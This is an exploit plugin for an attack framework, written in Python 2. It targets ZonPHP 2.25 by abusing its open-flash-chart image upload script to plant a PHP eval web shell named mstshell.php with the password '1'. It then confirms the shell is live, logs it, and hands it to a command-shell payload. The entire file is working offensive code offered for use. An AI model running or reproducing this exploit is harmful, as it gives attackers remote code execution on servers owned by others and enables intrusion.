
class mstplugin:
    infos = [
        ['NAME','ZonPHP 2.25 - Remote Code Execution (RCE) Vulnerability'],
        ['AUTHOR','mst'],
        ['UPTIME','20131027'],
        ['WEBSITE','http://mstoor.duapp.com']
        ]
    opts  = [
        ['URL','localhost','target url'],
        ['PORT','80','target port'],
        ['PATH','/','target app-path'],
        ['PAYLOAD','php_cmdshell','you can change it :)']
        ]
    def exploit(self):
        url   = fuck.urlformate(URL,PORT,PATH)
        shell = "<?php eval($_POST[1]);?>"
        shurl = url+"mstshell.php"
        shpwd = "1"
        exp   = url+"ofc/ofc_upload_image.php?name=mstshell.php"
        try:
            color.cprint("[+] Sending exp..",YELLOW)
            res=fuck.php_post(exp,shell)
            check=fuck.urlget(shurl)
            if check.getcode() == 200:
                color.cprint("[*] Exploit Successful !",CYAN)
                color.cprint("[-] Shell: %s\n[-] Paswd: %s"%(shurl,shpwd),GREEN)
                fuck.writelog("ZonPHP_2.25",url+"::"+shurl+"::"+shpwd)
                fuck.topayload(PAYLOAD,[shurl,shpwd])
            else:
                color.cprint("[!] Exploit False :%s"%check.getcode(),RED)
        except Exception,e:
            color.cprint("[!] ERR:%s"%e,RED)
